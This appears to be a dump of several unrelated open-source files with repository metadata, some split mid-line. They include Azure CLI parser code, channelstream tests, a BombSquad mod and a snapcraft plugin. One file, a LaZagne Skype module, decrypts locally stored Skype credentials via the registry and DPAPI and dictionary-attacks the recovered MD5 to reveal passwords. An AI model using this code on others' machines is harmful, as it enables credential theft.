print "\n Unable to find latest clojure-imdb-parser.jar:"
print "\n " + str(error)
sys.exit(1)
if latest_jar != None and str(latest_jar) != "":
latest_jar = _script_directory + "/release/" + str(latest_jar)
# Clean up path
pattern = re.compile(r'\n')
latest_jar = pattern.sub(" ", latest_jar).strip()
if verbose:
print "\n Latest clojure-imdb-parser.jar:"
print "\n " + latest_jar + "\n"
try:
# Execute the parser
process = subprocess.Popen(["java", "-jar", latest_jar, query_term, output_file, str(verbose)],
stdout=subprocess.PIPE)
output, stderr = process.communicate()
|
process.wait()
except exceptions.Exception as error:
print "\n Unable to execute clojure-imdb-parser.jar!"
print "\n " + str(error)
sys.exit(1)
else:
print "\n Unable to find latest clojure-imdb-parser.jar!"
sys.exit(1)
# Where we at?
print output
# If we're being run directly
if __name__ == "__main__":
main()
|
SecureBrain/JEB-sample-scripts
|
AlertMarker.py
|
Python
|
mit
| 1,017
| 0.000983
|
# JEB sample script
# http://www.android-decompiler.com/
#
# AlertMarker.py
# Set (unset) alert marker on the focused method.
#
# Copyright (c) 2013 SecureBrain
from jeb.api import IScript
from jeb.api.dex import Dex
from jeb.api.ui import View
import string
class AlertMarker(IScript):
def run(self, jeb):
self.jeb = jeb
self.dex = jeb.getDex()
self.ui = jeb.getUI()
success = self.start()
def start(self):
view = self.ui.getView(View.Type.ASSEMBLY)
msig = view.getCodePosition().getSignature()
md = self.dex.getMethodData(msig)
if not md:
print 'caret is not in method.'
return
f = md.getUserFlags()
print 'target:' + msig
if (f & Dex.FLAG_ALERT) == 0:
print 'set alert marker'
md.setUserFlags(f | Dex.FLAG_ALERT)
else:
|
print 'unset alert'
md.setUserFlags(f & ~Dex.FLAG_ALERT)
view.refresh()
|
AppEnlight/channelstream
|
tests/tests_views.py
|
Python
|
bsd-3-clause
| 21,292
| 0.00108
|
from gevent import monkey
monkey.patch_all()
import pytest
import gevent
import marshmallow
from channelstream.server_state import get_state
from channelstream.channel import Channel
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestConnectViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {}
try:
connect(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert exc.messages == {"username": ["Missing data for required field."]}
def test_good_json(self, dummy_request, test_uuids):
server_state = get_state()
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "username",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
assert server_state.channels == {}
result = connect(dummy_request)
assert len(server_state.channels.keys()) == 2
assert "username" in server_state.users
assert test_uuids[1] in server_state.connections
assert result["channels"] == ["a", "aB"]
assert result["state"] == {"bar": "baz", "key": "foo"}
assert result["conn_id"] == test_uuids[1]
channels_info = result["channels_info"]["channels"]
assert len(channels_info.keys()) == 2
assert channels_info["a"]["total_users"] == 1
assert channels_info["a"]["total_connections"] == 1
assert channels_info["a"]["users"] == ["username"]
assert channels_info["a"]["history"] == []
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "username"}
]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUserStateViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Missing data for required field."]}
def _connect_user(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
def test_not_found_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {"user": "blabla"}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Unknown user"]}
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
"state_public_keys": ["avatar", "bar"],
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert result["public_keys"] == ["avatar", "bar"]
assert sorted_changed == sorted(["bar", "private"])
def test_good_json_no_public_keys(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
assert result["public_keys"] == ["bar"]
|
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert sorted_changed == sorted(["bar", "private"])
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestSubscribeViews(object):
def test_bad_json(sel
|
f, dummy_request):
from channelstream.wsgi_views.server import subscribe
dummy_request.json_body = {}
try:
subscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, subscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["b"],
"channel_configs": {
"a": {"notify_presence": True},
"b": {"notify_presence": True},
},
}
result = subscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "b"])
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "test"}
]
assert "a" in result["channels_info"]["channels"]
assert "b" in result["channels_info"]["channels"]
assert result["channels_info"]["channels"]["a"]["total_connections"] == 1
assert result["channels_info"]["channels"]["a"]["total_users"] == 1
assert result["channels_info"]["channels"]["a"]["history"] == []
assert result["channels_info"]["channels"]["a"]["users"] == ["test"]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUnsubscribeViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import unsubscribe
dummy_request.json_body = {}
try:
unsubscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["aC", "a"],
}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["aB"])
def test_non_existing_channel(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dum
|
Mrmaxmeier/BombSquad-Community-Mod-Manager
|
mods/BackToYou.py
|
Python
|
unlicense
| 25,208
| 0.012734
|
import bs
import random
import bsUtils
#import PlayerSpaz
def bsGetAPIVersion():
# see bombsquadgame.com/apichanges
return 4
def bsGetGames():
return [BackToYou]
class Icon(bs.Actor):
def __init__(self,player,position,scale,showLives=True,showDeath=True,
nameScale=1.0,nameMaxWidth=115.0,flatness=1.0,shadow=1.0):
bs.Actor.__init__(self)
self._player = player
self._showLives = showLives
self._showDeath = showDeath
self._nameScale = nameScale
self._outlineTex = bs.getTexture('characterIconMask')
icon = player.getIcon()
self.node = bs.newNode('image',
owner=self,
attrs={'texture':icon['texture'],
'tintTexture':icon['tintTexture'],
'tintColor':icon['tintColor'],
'vrDepth':400,
'tint2Color':icon['tint2Color'],
'maskTexture':self._outlineTex,
'opacity':1.0,
'absoluteScale':True,
'attach':'bottomCenter'})
self._nameText = bs.newNode('text',
owner=self.node,
attrs={'text':player.getName(),
'color':bs.getSafeColor(player.getTeam().color),
'hAlign':'center',
'vAlign':'center',
'vrDepth':410,
'maxWidth':nameMaxWidth,
'shadow':shadow,
'flatness':flatness,
'hAttach':'center',
|
'vAttach':'bottom'})
if self._showLives:
self._livesText = bs.newNode('text',
|
owner=self.node,
attrs={'text':'x0',
'color':(1,1,0.5),
'hAlign':'left',
'vrDepth':430,
'shadow':1.0,
'flatness':1.0,
'hAttach':'center',
'vAttach':'bottom'})
self.setPositionAndScale(position,scale)
def setPositionAndScale(self,position,scale):
self.node.position = position
self.node.scale = [70.0*scale]
self._nameText.position = (position[0],position[1]+scale*52.0)
self._nameText.scale = 1.0*scale*self._nameScale
if self._showLives:
self._livesText.position = (position[0]+scale*10.0,position[1]-scale*43.0)
self._livesText.scale = 1.0*scale
def updateForLives(self):
if self._player.exists():
lives = self._player.gameData['lives']
else: lives = 0
if self._showLives:
if lives > 0: self._livesText.text = 'x'+str(lives-1)
else: self._livesText.text = ''
if lives == 0:
myAct = self._player.actor.getActivity()
if self._player in myAct.winners:
if myAct.winners[0] == self._player:
self._livesText.text = "1st"
elif myAct.winners[1] == self._player:
self._livesText.text = "2nd"
elif myAct.winners[2] == self._player:
self._livesText.text = "3rd"
else:
self._nameText.opacity = 0.2
self.node.color = (0.7,0.3,0.3)
self.node.opacity = 0.2
def handlePlayerSpawned(self):
if not self.node.exists(): return
self.node.opacity = 1.0
self.updateForLives()
def handlePlayerDied(self):
if not self.node.exists(): return
if self._showDeath:
bs.animate(self.node,'opacity',{0:1.0,50:0.0,100:1.0,150:0.0,200:1.0,250:0.0,
300:1.0,350:0.0,400:1.0,450:0.0,500:1.0,550:0.2})
lives = self._player.gameData['lives']
if lives == 0: bs.gameTimer(600,self.updateForLives)
class PlayerSpaz_BTY(bs.PlayerSpaz):
def handleMessage(self, m):
if isinstance(m, bs.HitMessage):
if not self.node.exists():
return
if not self.isAlive():
return #We don't want to be hitting corpses!
srcSpaz = None
theGame = self.getActivity()
for theSpaz in theGame.spazList:
if theSpaz.getPlayer() == m.sourcePlayer:
srcSpaz = theSpaz
break
#print(["HitSrc", srcSpaz])
#print(["hitSpaz", self])
if not srcSpaz == self:
if not srcSpaz == None:
#We need to calculate new position for hit. Otherwise it won't
#actually hit the source spaz if he's across the screen
p1 = m.pos
p2 = self.node.position
p3 = srcSpaz.node.position
hit2spaz = [p2[0]-p1[0],p2[1]-p1[1], p2[2]-p1[2]]
m.pos = [p3[0]-hit2spaz[0], p3[1]-hit2spaz[1], p3[2]-hit2spaz[2]]
m.sourcePlayer = self.getPlayer()
#print(['sroucenode', m.srcNode])
#print(['pos', m.pos])
#print(['velocity', m.velocity])
#print(['magnitude',m.magnitude])
#print(['vMag', m.velocityMagnitude])
#print(['radisu', m.radius])
#print([m.sourcePlayer])
#print(['kickback', m.kickBack])
#print(['flat', m.flatDamage])
#print(['hittype', m.hitType])
#print(['forcedir', m.forceDirection])
#print(['Hitsubtype', m.hitSubType])
super(srcSpaz.__class__, srcSpaz).handleMessage(m)
#if isinstance(m, bs.ImpactDamageMessage):
#print(["impact", m.intensity])
#super(self.__class__, self).handleMessage(m)
else:
super(self.__class__, self).handleMessage(m)
class BackToYou(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Back To You!'
@classmethod
def getScoreInfo(cls):
return {'scoreName':'Survived',
'scoreType':'seconds',
'noneIsWinner':False,
'lowerIsBetter':True}
@classmethod
def getDescription(cls,sessionType):
return 'Damage others to kill yourself! First one out wins!'
@classmethod
def supportsSessionType(cls,sessionType):
return True if (issubclass(sessionType,bs.TeamsSession)
or issubclass(sessionType,bs.FreeForAllSession)) else False
@classmethod
def getSupportedMaps(cls,sessionType):
return bs.getMapsSupportingPlayType("melee")
@classmethod
def getSettings(cls,sessionType):
settings = [("Lives Per Player",{'default':1,'minValue':1,'maxValue':10,'increment':1}),
("Time Limit",{'choices':[('None',0),('1 Minute',60),
('2 Minutes',120),('5 Minutes',300),
('10 Minutes',600),('20 Minutes',1200)],'default':0}),
("Respawn Times",{'choices':[('Shorter',0.25),('Short',0.5),('Normal',1.0),('Long',2.0),('Longer',4.0)],'default':1.0}),
("Epic Mode",{'default':False})]
if issubclass(sessionType,bs.TeamsSession):
settings.append(("Solo Mode",{'default':False}))
|
Relin/LaZagne
|
Windows/src/LaZagne/softwares/chats/skype.py
|
Python
|
lgpl-3.0
| 4,298
| 0.034435
|
from Crypto.Cipher import AES
import xml.etree.cElementTree as ET
import win32con, win32api, win32crypt
import base64, hashlib, os
import binascii, struct
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
from config.dico import get_dico
class Skype(ModuleInfo):
def __init__(self):
options = {'command': '-s', 'action': 'store_true', 'dest': 'skype', 'help': 'skype'}
ModuleInfo.__init__(self, 'skype', 'chats', options)
|
def aes_encrypt(self, message, passphrase):
IV = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
# get value used to build the salt
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return 'failed'
# get hash from configuration file
def get_hash_credential(self, xml_file):
tree = ET.ElementTree(file=xml_file)
encrypted_hash = tree.find('Lib/Account/Credentials3')
if encrypted_hash != None:
return encrypted_hash.text
else:
return 'failed'
# decrypt hash to get the md5 to bruteforce
def get_md5_hash(self, enc_hex, key):
# convert hash from hex to binary
enc_binary = binascii.unhexlify(enc_hex)
# retrieve the salt
salt = hashlib.sha1('\x00\x00\x00\x00' + key).digest() + hashlib.sha1('\x00\x00\x00\x01' + key).digest()
# encrypt value used with the XOR operation
aes_key = self.aes_encrypt(struct.pack('I', 0) * 4, salt[0:32])[0:16]
# XOR operation
decrypted = []
for d in range(16):
decrypted.append(struct.unpack('B', enc_binary[d])[0] ^ struct.unpack('B', aes_key[d])[0])
# cast the result byte
tmp = ''
for dec in decrypted:
tmp = tmp + struct.pack(">I", dec).strip('\x00')
# byte to hex
return binascii.hexlify(tmp)
def dictionary_attack(self, login, md5):
wordlist = get_dico()
for word in wordlist:
hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest()
if hash == md5:
return word
return False
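# Illustrative note (not from the original source): for a login of 'alice' and a candidate
# password 'hunter2', the loop above compares
#   hashlib.md5('alice\nskyper\nhunter2').hexdigest()
# against the md5 recovered from the decrypted Credentials3 value in config.xml.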
# main function
def run(self):
# print title
Header().title_info('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'):
values = {}
try:
values['username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml')
if enc_hex == 'failed':
print_debug('WARNING', 'No credential stored on the config.xml file.')
else:
# decrypt the hash to get the md5 to brute force
values['hash_md5'] = self.get_md5_hash(enc_hex, key)
values['shema to bruteforce'] = values['username'] + '\\nskyper\\n<password>'
# Try a dictionary attack on the hash
password = self.dictionary_attack(values['username'], values['hash_md5'])
if password:
values['password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
|
westpa/westpa
|
src/westext/adaptvoronoi/__init__.py
|
Python
|
mit
| 82
| 0
|
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoronoiDriver
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/parser.py
|
Python
|
mit
| 9,504
| 0.00263
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogging as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
'''Raised when a command is incorrectly used and the usage should be
displayed to the user.
'''
pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter): # pylint: disable=too-few-public-methods
def __call__(self, prefix, **kwargs):
return (c for c in self.choices if c.lower().startswith(prefix.lower()))
# Override the choices completer with one that is case insensitive
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
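# Hedged illustration (standalone use with assumed choices; not how the CLI wires it up):
#   completer = CaseInsensitiveChoicesCompleter(('WestUS', 'EastUS'))
#   list(completer('west'))   # -> ['WestUS'], matched regardless of the prefix's casing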
def enable_autocomplete(parser):
argcomplete.autocomplete = argcomplete.CompletionFinder()
argcomplete.autocomplete(parser, validator=lambda c, p: c.lower().startswith(p.lower()),
default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
"""ArgumentParser implementation specialized for the
Azure CLI utility.
"""
def __init__(self, **kwargs):
self.subparsers = {}
self.parents = kwargs.get('parents', [])
self.help_file = kwargs.pop('help_file', None)
# We allow a callable for description to be passed in in order to delay-load any help
# or description for a command. We better stash it away before handing it off for
# "normal" argparse handling...
self._description = kwargs.pop('description', None)
self.command_source = kwargs.pop('_command_source', None)
super(AzCliCommandParser, self).__init__(**kwargs)
def load_command_table(self, command_table):
"""Load a command table into our parser.
"""
# If we haven't already added a subparser, we
# better do it.
if not self.subparsers:
sp = self.add_subparsers(dest='_command_package')
sp.required = True
self.subparsers = {(): sp}
for command_name, metadata in command_table.items():
subparser = self._get_subparser(command_name.split())
command_verb = command_name.split()[-1]
# To work around http://bugs.python.org/issue9253, we artificially add any new
# parsers we add to the "choices" section of the subparser.
subparser.choices[command_verb] = command_verb
# inject command_module designer's help formatter -- default is HelpFormatter
fc = metadata.formatter_class or argparse.HelpFormatter
command_parser = subparser.add_parser(command_verb,
description=metadata.description,
parents=self.parents,
conflict_handler='error',
help_file=metadata.help,
formatter_class=fc,
_command_source=metadata.command_source)
argument_validators = []
argument_groups = {}
for arg in metadata.arguments.values():
if arg.validator:
argument_validators.append(arg.validator)
if arg.arg_group:
try:
group = argument_groups[arg.arg_group]
except KeyError:
# group not found so create
group_name = '{} Arguments'.format(arg.arg_group)
group = command_parser.add_argument_group(
arg.arg_group, group_name)
argument_groups[arg.arg_group] = group
param = group.add_argument(
*arg.options_list, **arg.options)
else:
try:
param = command_parser.add_argument(
*arg.options_list, **arg.options)
except argparse.ArgumentError:
dest = arg.options['dest']
if dest in ['no_wait', 'raw']:
pass
else:
raise
param.completer = arg.completer
command_parser.set_defaults(
func=metadata,
command=command_name,
_validators=argument_validators,
_parser=command_parser)
def _get_subparser(self, path):
"""For each part of the path, walk down the tree of
subparsers, creating new ones if one doesn't already exist.
"""
for length in range(0, len(path)):
parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
if not parent_subparser:
# No subparser exists for the given subpath - create and register
# a new subparser.
# Since we know that we always have a root subparser (we created)
# one when we started loading the command table, and we walk the
# path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
# with ensuring that a subparser for cmd exists, then for subcmd1,
# subcmd2 and so on), we know we can always back up one step and
# add a subparser if one doesn't exist
grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
new_parser = grandparent_subparser.add_parser(path[length - 1])
# Due to http://bugs.python.org/issue9253, we have to give the subparser
# a destination and set it to required in order to get a
# meaningful error
parent_subparser = new_parser.add_subparsers(dest='subcommand')
parent_subparser.required = True
self.subparsers[tuple(path[0:length])] = parent_subparser
return parent_subparser
def _handle_command_package_error(self, err_msg): # pylint: disable=no-self-use
if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
import re
try:
possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
err_msg).group(1)
handle_module_not_installed(possible_module)
except AttributeError:
# regular expression pattern match failed so unable to retrieve
# module name
pass
except Exception as e: # pylint: disable=broad-except
logger.debug('Unable to handle module not installed: %s', str(e))
def validation_error(self, message):
telemetry.set_user_fault('validation error')
return super(AzCliCommandParser, self).error(message)
def error(self, message):
telemetry.set_user_fault('parse error: {}'.format(message))
self._handle_command_package_error(message)
args = {'prog': self.prog, 'message': message}
logger.error('%(prog)s: error: %(message)s', args)
self.print_usage(sys.stderr)
self.exit(2)
def format_help(self):
is_group = self.is_group()
telemetry.set_command_details(command=self.prog[3:])
telemetry.set_success(summary='show help')
_help.show_help(self.prog.split()[1:],
self._actions[-1] if is_group else self,
is_group)
se
|
ubuntu-core/snapcraft
|
snapcraft/plugins/v1/crystal.py
|
Python
|
gpl-3.0
| 4,665
| 0.001501
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2019 Manas.Tech
# License granted by Canonical Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""The Crystal plugin can be used for Crystal projects using `shards`.
This plugin uses the common plugin keywords as well as those for "sources".
For more information check the 'plugins' topic for the former and the
'sources' topic for the latter.
Additionally, this plugin uses the following plugin-specific keywords:
- crystal-channel:
(string, default: latest/stable)
The Snap Store channel to install Crystal from.
- crystal-build-options
(list of strings, default: '[]')
Options to use during shards build.
"""
import os
import shutil
from snapcraft import file_utils
from snapcraft.internal import common, elf, errors
from snapcraft.plugins.v1 import PluginV1
_CRYSTAL_CHANNEL = "latest/stable"
class CrystalPlugin(PluginV1):
@classmethod
def schema(cls):
schema = super().schema()
schema["properties"]["crystal-channel"] = {
"type": "string",
"default": _CRYSTAL_CHANNEL,
}
schema["properties"]["crystal-build-options"] = {
"type": "array",
"minitems": 1,
|
"uniqueItems": True,
"items": {"type": "string"},
"default": [],
}
schema["required"] = ["source"]
return schema
@classmethod
def get_build_properties(cls):
return ["crystal-build-options"]
@classmethod
def get_pull_properties(cls):
|
return ["crystal-channel"]
def __init__(self, name, options, project):
super().__init__(name, options, project)
if project._get_build_base() not in ("core", "core16", "core18"):
raise errors.PluginBaseError(
part_name=self.name, base=project._get_build_base()
)
self.build_snaps.append("crystal/{}".format(self.options.crystal_channel))
self.build_packages.extend(
[
"gcc",
"pkg-config",
"libpcre3-dev",
"libevent-dev",
"libyaml-dev",
"libgmp-dev",
"libxml2-dev",
]
)
def build(self):
super().build()
self.run(["shards", "install", "--production"], self.builddir)
self.run(
["shards", "build", "--production"] + self.options.crystal_build_options,
self.builddir,
)
output_bin = os.path.join(self.builddir, "bin")
if not os.path.exists(output_bin):
raise errors.SnapcraftEnvironmentError(
"No binaries were built. Ensure the shards.yaml contains valid targets."
)
install_bin_path = os.path.join(self.installdir, "bin")
bin_paths = (os.path.join(output_bin, b) for b in os.listdir(output_bin))
elf_files = (elf.ElfFile(path=b) for b in bin_paths if elf.ElfFile.is_elf(b))
os.makedirs(install_bin_path, exist_ok=True)
for elf_file in elf_files:
shutil.copy2(
elf_file.path,
os.path.join(install_bin_path, os.path.basename(elf_file.path)),
)
elf_dependencies_path = elf_file.load_dependencies(
root_path=self.installdir,
core_base_path=common.get_installed_snap_path(
self.project._get_build_base()
),
arch_triplet=self.project.arch_triplet,
content_dirs=self.project._get_provider_content_dirs(),
)
for elf_dependency_path in elf_dependencies_path:
lib_install_path = os.path.join(
self.installdir, elf_dependency_path[1:]
)
os.makedirs(os.path.dirname(lib_install_path), exist_ok=True)
if not os.path.exists(lib_install_path):
file_utils.link_or_copy(
elf_dependency_path, lib_install_path, follow_symlinks=True
)
|
LouisPlisso/analysis_tools
|
old_create_hdf5_data_non_interacif.py
|
Python
|
gpl-3.0
| 2,240
| 0.003125
|
import numpy as np
import h5py
f = h5py.File('hdf5/data_streaming.h5', 'w')
ADSL_2008 = f.create_group("ADSL_Montsouris_2008_07_01")
# retrieve: ADSL_2008 = f['ADSL_Montsouris_2008_07_01']
gvb_adsl_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_ADSL_cut_BGP_AS.npy')
ADSL_2008.create_dataset('GVB', data=gvb_adsl_2008)
dipcp_adsl_2008 = np.load('python_flows/dipcp_flows_ADSL_juill_2008.npy')
ADSL_2008.create_dataset('dipcp', data=dipcp_adsl_2008)
FTTH_2008 = f.create_group("FTTH_Montsouris_2008_07_01")
# retrieve: FTTH_2008 = f['FTTH_Montsouris_2008_07_01']
gvb_ftth_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_FTTH_BGP_AS.npy')
FTTH_2008.create_dataset('GVB', data=gvb_ftth_2008)
dipcp_ftth_2008 = np.load('python_flows/dipcp_flows_FTTH_juill_2008_TCP.npy')
FTTH_2008.create_dataset('dipcp', data=dipcp_ftth_2008)
ADSL_nov_2009 = f.create_group("ADSL_Montsouris_2009_11_26")
gvb_adsl_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_ADSL_BGP_AS.npy')
ADSL_nov_2009.create_dataset('GVB', data=gvb_adsl_nov_2009)
dipcp_adsl_nov_2009 = np.load('python_flows/dipcp_flows_ADSL_nov_2009.npy')
ADSL_nov_2009.create_dataset('dipcp', data=dipcp_adsl_nov_2009)
FTTH_nov_2009 = f.create_group("FTTH_Montsouris_2009_11_26")
gvb_ftth_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_FTTH_BGP_AS.npy')
FTTH_nov_2009.create_dataset('GVB', data=gvb_ftth_nov_2009)
dipcp_ftth_nov_2009 = np.load('python_flows/dipcp_flows_FTTH_nov_2009.npy')
FTTH_nov_2009.create_dataset('dipcp', data=dipcp_ftth_nov_2009)
ADSL_dec_2009 = f.create_group("ADSL_Rennes_2009_12_14")
gvb_adsl_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_ADSL_BGP_AS.npy')
ADSL_dec_2009.create_dataset('GVB', data=gvb_adsl_dec_2009)
dipcp_adsl_dec_2009 = np.load('python_flows/dipcp_flows_ADSL_dec_2009.npy')
ADSL_dec_2009.create_dataset('dipcp', data=dipcp_adsl_dec_2009)
FTTH_dec_2009 = f.create_group("FTTH_Montsouris_2009_12_14")
gvb_ftth_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_FTTH_BGP_AS.npy')
FTTH_dec_2009.create_dataset('GVB', data=gvb_ftth_dec_2009)
dipcp_ftth_dec_2009 = np.load('python_flows/dipcp_flows_FTTH_dec_2009.npy')
FTTH_dec_2009.create_dataset('dipcp', data=dipcp_ftth_dec_2009)
|
byakatat/selenium-training
|
task19_PageObject/test_task19.py
|
Python
|
apache-2.0
| 498
| 0.002008
|
from task19_PageObject.MainPage import MainPage
def test_adding_and_deleting_from_cart(driver):
main_page = MainPage(driver)
main_page.open()
# Add 3 ducks to the cart in a loop
for i in range(1, 4):
# Click at the i-d duck
product_page = main_page.click_to_product_number(i)
product_page.put_product_into_cart()
main_page = product_page.go_to_home_page()
cart_page = main_page.go_to_checkout()
|
cart_page.remove_all_items_from_cart()
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
Python
|
mit
| 2,332
| 0
|
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
:configs OSTemplateRenderer: A config tempating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
